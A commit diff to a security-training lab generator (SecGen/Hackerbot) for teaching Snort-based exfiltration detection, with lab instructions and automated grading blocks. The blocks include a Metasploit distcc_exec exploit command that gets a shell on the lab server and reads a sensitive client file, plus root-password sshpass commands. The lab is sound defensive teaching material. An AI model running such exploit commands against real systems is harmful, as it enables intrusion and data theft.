lab updates

2026-02-21 11:18:06 +00:00 · 2018-11-14 16:29:24 +00:00
parent 969f345dfd
commit 53df8765f4
5 changed files with 56 additions and 105 deletions
--- a/modules/generators/structured_content/hackerbot_config/ids_exfiltration/templates/dlp.md.erb
+++ b/modules/generators/structured_content/hackerbot_config/ids_exfiltration/templates/dlp.md.erb
@@ -22,10 +22,10 @@ It is possible to write Snort rules that detect the transfer of the contents of

 Hint: consider using the pcre keyword in your rule.

-> Side note: *Hash-based exfiltration detection*: **you don't need to use this for this lab.**
+#### Hash-based exfiltration detection

 > Assuming the data you are protecting is sensitive, you likely don't want your Snort rules to contain direct copies of all your most sensitive data. For this reason, Snort rules can contain hashes to match against.

 > Using newer versions of Snort it is possible to write Snort rules that detect the transfer of the contents of your files, based on hashes (using the protected\_content keyword), so that the Snort rule does not contain any plain text of your document.

---
+---
--- a/modules/generators/structured_content/hackerbot_config/ids_exfiltration/templates/intro.md.erb
+++ b/modules/generators/structured_content/hackerbot_config/ids_exfiltration/templates/intro.md.erb
@@ -8,15 +8,15 @@ This week's lab is entirely problem-based.
 ==Start these VMs== (if you haven't already):

 - hackerbot_server (leave it running, you don't log into this)
- ids_server (IP address: <%= $ids_server_ip %>)
+- ids_snoop (IP address: <%= $ids_snoop_ip %>)
 - web_server (IP address: <%= $web_server_ip %>, leave it running, you don't log into this through the gui console, you may ssh to it later in the lab)
 - desktop

 All of these VMs need to be running to complete the lab.

-**Ensure the ids_server VM is allowed promiscuous mode.** If you are completing this lab on Leeds Beckett oVirt infrastructure, this should be sorted. Otherwise, if you have used SecGen to spin up VMs, you need to ensure your VMs have permission to monitor networks using promiscuous mode. On the Leeds Beckett oVirt infrastructure we have snoop networks, which mirror all the traffic between systems. On Virtualbox, you would need to go to Advanced network settings for the host-only network on the ids_server and enable promiscious mode. 
+**Ensure the ids_snoop VM is allowed promiscuous mode.** If you are completing this lab on Leeds Beckett oVirt infrastructure, this should be sorted. Otherwise, if you have used SecGen to spin up VMs, you need to ensure your VMs have permission to monitor networks using promiscuous mode. On the Leeds Beckett oVirt infrastructure we have snoop networks, which mirror all the traffic between systems. On Virtualbox, you would need to go to Advanced network settings for the host-only network on the ids_snoop and enable promiscious mode.

-### Your login details for the "desktop" and "ids_server" VMs
+### Your login details for the "desktop" and "ids_snoop" VMs
 User: <%= $main_user %>
 Password: tiaspbiqe2r (**t**his **i**s **a** **s**ecure **p**assword **b**ut **i**s **q**uite **e**asy **2** **r**emember)

@@ -36,7 +36,7 @@ Work through the below exercises, completing the Hackerbot challenges as noted.
 ---
 ## Getting Snort up and running

-**On the ids_server VM:**
+**On the ids_snoop VM:**

 ==Change Snort's output== to something more readable:

@@ -50,21 +50,7 @@ sudo vi /etc/snort/snort.conf
 ==Add the following lines:==
 `output alert_fast`

-`include $RULE_PATH/my.rules`
-
-==Create a new rules file:==
-
-```bash
-sudo touch /etc/snort/rules/my.rules
-```
-
-Let us edit the rules file without sudo:
-
-```bash
-sudo chown <%= $main_user %> /etc/snort/rules/my.rules
-```
-
-==Change Snort's interface== to the interface with IP address <%= $ids_server_ip %> (likely eth1), and set the local network to your IP address range (or "any"):
+==Change Snort's interface== to the interface with IP address <%= $ids_snoop_ip %> (likely ens3), and set the local network to your IP address range (or "any"):

 ```bash
 sudo vi /etc/snort/snort.debian.conf
@@ -83,4 +69,3 @@ sudo service snort start
 Snort should now be running, monitoring network traffic for activity.

 It can be helpful to monitor network traffic while writing IDS rules. You can start Wireshark with `kdesudo wireshark &`
-
--- a/modules/generators/structured_content/hackerbot_config/ids_exfiltration/templates/lab.xml.erb
+++ b/modules/generators/structured_content/hackerbot_config/ids_exfiltration/templates/lab.xml.erb
@@ -129,7 +129,7 @@ Randomised instance generated by [SecGen](http://github.com/cliffe/SecGen) (<%=
 		<!--trigger the rule by sending the data-->
 		<post_command>cat <%= $rand_tmp_restingplace %>; echo --$?</post_command>
 		<!--get the snort alerts after, and diff for new alerts generated-->
-		<post_shell>sshpass -p <%= $root_password %> scp -prv -oStrictHostKeyChecking=no root@<%= $ids_server_ip %>:/var/log/snort/alert /tmp/snort_alert_after; echo --$?; diff -n /tmp/snort_alert_before /tmp/snort_alert_after | tail -n 5 | grep <%= $rand_alert0 %> >/dev/null; echo triggered:$?; sshpass -p <%= $root_password %> scp -prv -oStrictHostKeyChecking=no root@<%= $ids_server_ip %>:/etc/snort/rules/local.rules /tmp/snort_rules; echo rules:$?; grep '^alert.*msg:".*<%= $rand_alert0 %>.*".*content:"' /tmp/snort_rules >/dev/null; echo good_rule:$? </post_shell>
+		<post_shell>sshpass -p <%= $root_password %> scp -prv -oStrictHostKeyChecking=no root@<%= $ids_server_ip %>:/var/log/snort/alert /tmp/snort_alert_after; echo --$?; diff -n /tmp/snort_alert_before /tmp/snort_alert_after | tail -n 5 | grep <%= $rand_alert0 %> >/dev/null; echo triggered:$?; sshpass -p <%= $root_password %> scp -prv -oStrictHostKeyChecking=no root@<%= $ids_server_ip %>:/etc/snort/rules/local.rules /tmp/snort_rules; echo rules:$?; awk '/^alert/ && /<%= $rand_alert0 %>/ && /content ?: ?"/' /tmp/snort_rules |grep '' >/dev/null; echo good_rule:$? </post_shell>
 		<suppress_command_output_feedback />

 		<prompt>You need to monitor your sensitive list of clients. The file contains credit card details and national insurance numbers. You have a copy in <%= $sensitive_files_location %>clients.csv Use one or more Snort rules to detect unencrypted transport of the file. The alert must include the message "<%= $rand_alert0 %>". (This attack may take a while.)</prompt>
@@ -166,55 +166,6 @@ Randomised instance generated by [SecGen](http://github.com/cliffe/SecGen) (<%=
 		<tutorial><%= ERB.new(File.read self.templates_path + 'dlp.md.erb').result(self.get_binding) %></tutorial>
 	</attack>

-
-<!--TODO: use a version of snort that supports protected_content (2.9.7+ as found in Debian Stretch) -->
-<!--TODO: the below should work with the right version of Snort-->
-	<attack>
-<% $rand_alert1 = SecureRandom.hex(3) %>
-		<!-- get the snort alerts before -->
-		<!-- and make a copy of the file to a new location  -->
-		<pre_shell>sshpass -p <%= $root_password %> ssh -oStrictHostKeyChecking=no root@<%= $web_server_ip %> 'cp <%= $sensitive_files_location %>clients.csv <%= $rand_tmp_restingplace %>; chmod 644 <%= $rand_tmp_restingplace %>'; stat0=$?; echo -$stat0; sshpass -p <%= $root_password %> scp -prv -oStrictHostKeyChecking=no root@<%= $ids_server_ip %>:/var/log/snort/alert /tmp/snort_alert_before; echo --$?</pre_shell>
-		<!-- exploit and read contents of sensitive file over the network -->
-		<get_shell>msfconsole -x "use exploit/unix/misc/distcc_exec; set RHOST <%= $web_server_ip %>; exploit"</get_shell>
-		<!-- trigger the rule by sending the data -->
-		<post_command>cat <%= $rand_tmp_restingplace %>; echo --$?</post_command>
-		<!-- get the snort alerts after, and diff for new alerts generated -->
-		<post_shell>sshpass -p <%= $root_password %> scp -prv -oStrictHostKeyChecking=no root@<%= $ids_server_ip %>:/var/log/snort/alert /tmp/snort_alert_after; echo --$?; diff -n /tmp/snort_alert_before /tmp/snort_alert_after | tail -n 5 | grep <%= $rand_alert1 %> >/dev/null; echo triggered:$?; sshpass -p <%= $root_password %> scp -prv -oStrictHostKeyChecking=no root@<%= $ids_server_ip %>:/etc/snort/rules/local.rules /tmp/snort_rules; echo rules:$?; grep '^alert.*msg:".*<%= $rand_alert1 %>.*".*protected_content:"' /tmp/snort_rules >/dev/null; echo good_rule:$? </post_shell>
-		<!-- <suppress_command_output_feedback /> -->
-
-		<prompt>Update your rule so that it doesn't contain any of the sensitive data. Use hash-based matching. You have a copy in <%= $sensitive_files_location %>clients.csv Use one or more Snort rules to detect unencrypted transport of the file. The alert must include the message "<%= $rand_alert1 %>".</prompt>
-
-		<condition>
-			<output_matches>good_rule:1</output_matches>
-			<message>:( Couldn't find your snort rule on the IDS server in /etc/snort/rules/local.rules. You are missing *protected_content* matching or the message from your rule.</message>
-		</condition>
-		<condition>
-			<output_matches>triggered:1</output_matches>
-			<message>:( Your rule wasn't triggered.</message>
-		</condition>
-		<condition>
-			<output_matches>triggered:0.*good_rule:0</output_matches>
-			<message>:) Well done! <%= $flags.pop %>.</message>
-			<trigger_next_attack />
-		</condition>
-		<condition>
-			<output_matches>--1</output_matches>
-			<message>:( Failed to scp to the ids server (<%= $ids_server_ip %>)</message>
-		</condition>
-		<condition>
-			<output_matches>-1</output_matches>
-			<message>:( Failed to ssh to the web server (<%= $web_server_ip %>)</message>
-		</condition>
-		<condition>
-			<output_matches>--0</output_matches>
-			<message>Continuing...</message>
-		</condition>
-		<else_condition>
-			<message>:( Something was not quite right...</message>
-		</else_condition>
-
-	</attack>
-
 	<attack>
 <% $rand_alert2 = SecureRandom.hex(3)
   $rand_tmp_restingplace_fake = "/tmp/#{SecureRandom.hex(3)}"  %>
@@ -226,7 +177,7 @@ Randomised instance generated by [SecGen](http://github.com/cliffe/SecGen) (<%=
 		<!--trigger the rule by sending the data-->
 		<post_command>cat <%= $rand_tmp_restingplace_fake %>; echo --$?</post_command>
 		<!--get the snort alerts after, and diff for new alerts generated-->
-		<post_shell>sshpass -p <%= $root_password %> scp -prv -oStrictHostKeyChecking=no root@<%= $ids_server_ip %>:/var/log/snort/alert /tmp/snort_alert_after; echo --$?; diff -n /tmp/snort_alert_before /tmp/snort_alert_after | tail -n 5 | grep <%= $rand_alert2 %> >/dev/null; echo triggered:$?; sshpass -p <%= $root_password %> scp -prv -oStrictHostKeyChecking=no root@<%= $ids_server_ip %>:/etc/snort/rules/local.rules /tmp/snort_rules; echo rules:$?; grep '^alert.*msg:".*<%= $rand_alert2 %>.*".*pcre:"' /tmp/snort_rules >/dev/null; echo good_rule:$? </post_shell>
+		<post_shell>sshpass -p <%= $root_password %> scp -prv -oStrictHostKeyChecking=no root@<%= $ids_server_ip %>:/var/log/snort/alert /tmp/snort_alert_after; echo --$?; diff -n /tmp/snort_alert_before /tmp/snort_alert_after | tail -n 5 | grep <%= $rand_alert2 %> >/dev/null; echo triggered:$?; sshpass -p <%= $root_password %> scp -prv -oStrictHostKeyChecking=no root@<%= $ids_server_ip %>:/etc/snort/rules/local.rules /tmp/snort_rules; echo rules:$?; awk '/^alert/ && /<%= $rand_alert2 %>/ && /pcre ?: ?"/' /tmp/snort_rules |grep '' >/dev/null; echo good_rule:$? </post_shell>
 		<suppress_command_output_feedback />

 		<prompt>Update your rule so that it also matches the fake_clients file. Use REGEXP so that your rule doesn't include any of the actual data. You have a copy in <%= $sensitive_files_location %>fake_clients.csv Use one or more Snort rules to detect unencrypted transport of either of the files. The alert must include the message "<%= $rand_alert2 %>".</prompt>
@@ -270,4 +221,50 @@ Randomised instance generated by [SecGen](http://github.com/cliffe/SecGen) (<%=
 	</attack>


+  <!-- requires use a version of snort that supports protected_content (2.9.7+ as found in Debian Stretch) -->
+	<attack>
+<% $rand_alert1 = SecureRandom.hex(3) %>
+		<!-- get the snort alerts before -->
+		<!-- and make a copy of the file to a new location  -->
+		<pre_shell>sshpass -p <%= $root_password %> ssh -oStrictHostKeyChecking=no root@<%= $web_server_ip %> 'cp <%= $sensitive_files_location %>clients.csv <%= $rand_tmp_restingplace %>; chmod 644 <%= $rand_tmp_restingplace %>'; stat0=$?; echo -$stat0; sshpass -p <%= $root_password %> scp -prv -oStrictHostKeyChecking=no root@<%= $ids_server_ip %>:/var/log/snort/alert /tmp/snort_alert_before; echo --$?</pre_shell>
+		<!-- exploit and read contents of sensitive file over the network -->
+		<get_shell>msfconsole -x "use exploit/unix/misc/distcc_exec; set RHOST <%= $web_server_ip %>; exploit"</get_shell>
+		<!-- trigger the rule by sending the data -->
+		<post_command>cat <%= $rand_tmp_restingplace %>; echo --$?</post_command>
+		<!-- get the snort alerts after, and diff for new alerts generated -->
+		<post_shell>sshpass -p <%= $root_password %> scp -prv -oStrictHostKeyChecking=no root@<%= $ids_server_ip %>:/var/log/snort/alert /tmp/snort_alert_after; echo --$?; diff -n /tmp/snort_alert_before /tmp/snort_alert_after | tail -n 5 | grep <%= $rand_alert1 %> >/dev/null; echo triggered:$?; sshpass -p <%= $root_password %> scp -prv -oStrictHostKeyChecking=no root@<%= $ids_server_ip %>:/etc/snort/rules/local.rules /tmp/snort_rules; echo rules:$?; awk '/^alert/ && /<%= $rand_alert1 %>/ && /protected_content ?: ?"/' /tmp/snort_rules |grep '' >/dev/null; echo good_rule:$? </post_shell>
+		<suppress_command_output_feedback />
+
+		<prompt>Update your rule so that it doesn't contain any of the sensitive data. Use hash-based matching. You have a copy in <%= $sensitive_files_location %>clients.csv Use one or more Snort rules to detect unencrypted transport of the file. The alert must include the message "<%= $rand_alert1 %>".</prompt>
+
+		<condition>
+			<output_matches>good_rule:1</output_matches>
+			<message>:( Couldn't find your snort rule on the IDS server in /etc/snort/rules/local.rules. You are missing *protected_content* matching or the message from your rule.</message>
+		</condition>
+		<condition>
+			<output_matches>triggered:1</output_matches>
+			<message>:( Your rule wasn't triggered. Hints: you don't know where in the packet the protected content will be so you can first have a content rule based on something you know will come first, and specify a distance between that and the protected content.</message>
+		</condition>
+		<condition>
+			<output_matches>triggered:0.*good_rule:0</output_matches>
+			<message>:) Well done! <%= $flags.pop %>.</message>
+			<trigger_next_attack />
+		</condition>
+		<condition>
+			<output_matches>--1</output_matches>
+			<message>:( Failed to scp to the ids server (<%= $ids_server_ip %>)</message>
+		</condition>
+		<condition>
+			<output_matches>-1</output_matches>
+			<message>:( Failed to ssh to the web server (<%= $web_server_ip %>)</message>
+		</condition>
+		<condition>
+			<output_matches>--0</output_matches>
+			<message>Continuing...</message>
+		</condition>
+		<else_condition>
+			<message>:( Something was not quite right...</message>
+		</else_condition>
+	</attack>
+
 </hackerbot>
--- a/modules/generators/structured_content/hackerbot_config/ids_exfiltration/templates/random_service_ids_rule.xml.erb
+++ b/modules/generators/structured_content/hackerbot_config/ids_exfiltration/templates/random_service_ids_rule.xml.erb
@@ -1,31 +0,0 @@
-	<attack>
-<%  $services = {'FTP'=>'20','Telnet'=>'23','SMTP'=>'25','HTTP'=>'80','POP3'=>'110','IMAP'=>'143','SNMP'=>'161','LDAP'=>'389','HTTPS'=>'443','LDAPS'=>'636'}
-    $rand_service1 = $services.keys.sample
-    $rand_alert3 = SecureRandom.hex(3) %>
-		<pre_shell>sshpass -p <%= $root_password %> scp -prv -oStrictHostKeyChecking=no root@<%= $ids_server_ip %>:/var/log/snort/alert /tmp/snort_alert_before; stat1=$?; nmap -sT -p 1000,<%= $services[$rand_service1] %> <%= $web_server_ip %> > /dev/null; stat2=$?; sshpass -p <%= $root_password %> scp -prv -oStrictHostKeyChecking=no root@<%= $ids_server_ip %>:/var/log/snort/alert /tmp/snort_alert_after; stat3=$?; echo --$stat1$stat2$stat3; diff -u /tmp/snort_alert_before /tmp/snort_alert_after | tail -n 5</pre_shell>
-		<get_shell>false</get_shell>
-		<post_command></post_command>
-
-		<prompt>Create a Snort rule that detects any TCP connection attempt to <%= $rand_service1 %> (just the connection attempt, does not require content inspection) on <%= $web_server_ip %>. The alert must include the message "<%= $rand_alert3 %>".</prompt>
-
-		<condition>
-			<output_matches>^--1</output_matches>
-			<message>:( Failed to scp to your system.</message>
-		</condition>
-		<condition>
-			<output_matches>^--01</output_matches>
-			<message>:( Failed to scan your system.</message>
-		</condition>
-		<condition>
-			<output_matches>^--[01][01]1</output_matches>
-			<message>:( Failed to scp to your system (the second time).</message>
-		</condition>
-		<condition>
-			<output_matches><%= $rand_alert3 %></output_matches>
-			<message>:) Well done! <%= $flags.pop %>.</message>
-			<trigger_next_attack />
-		</condition>
-		<else_condition>
-			<message>:( Your rule didn't get triggered (or didn't include the right message).</message>
-		</else_condition>
-	</attack>
--- a/scenarios/labs/8_exfiltration_detection.xml
+++ b/scenarios/labs/8_exfiltration_detection.xml
@@ -232,7 +232,7 @@

 		<vulnerability module_path=".*distcc_exec"/>

-		<!--<service module_path=".*vsftpd"/>-->
+		<service module_path=".*vsftpd"/>

 		<service type="pop3"/>